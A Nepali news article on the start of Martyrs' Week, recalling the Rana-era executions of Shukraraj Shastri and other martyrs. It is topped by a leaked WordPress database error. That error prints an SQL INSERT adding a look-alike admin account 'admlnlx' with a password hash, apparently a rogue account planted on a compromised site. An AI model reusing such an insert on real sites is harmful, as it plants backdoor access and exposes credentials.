WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BaldbcLURpVYjPuYevnUYOkYL/uEuY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:51:10', '', 'admlnlx', 'admlnlx')
काठमान्डौं, माघ १०-
विभिन्न राजनीतिक आन्दोलनका क्रममा जीवनको बलिदानी गरेका सहिदहरुको सम्झनामा आजदेखि सहिद सप्ताह सुरु भएको छ ।माघ १० अर्थात आजकै दिन योद्धा शुक्रराज शास्त्रीले मुलुकमा प्रजातन्त्र प्राप्तीका लागि टेकुको पचलीमा जीवन बलिदानी दिएका थिए । तत्कालीन जहानियाँ राणा शासकले विक्रम सवतं १९९७ माघ १० गते शास्त्रीलाई पचलीस्थित रुखमा झुन्डाएर मृत्युदण्ड दिएको थियो ।
यस्तै माघ १३ गते सिफलमा धर्मभक्त माथेमा तथा माघ १५ गते दशरथ चन्द र गङ्गालाल श्रेष्ठलाई शोभाभगवतीमा गोली हानी मृत्युदण्ड दिएका थिए ।सात दिन सहिद सप्ताह मनाएपछि माघ १६ गते सहिद दिवस मनाउने गरिन्छ । हरेक वर्ष माघ १० गतेदेखि सात दिन सहिद सप्ताह मनाउने गरिएको छ ।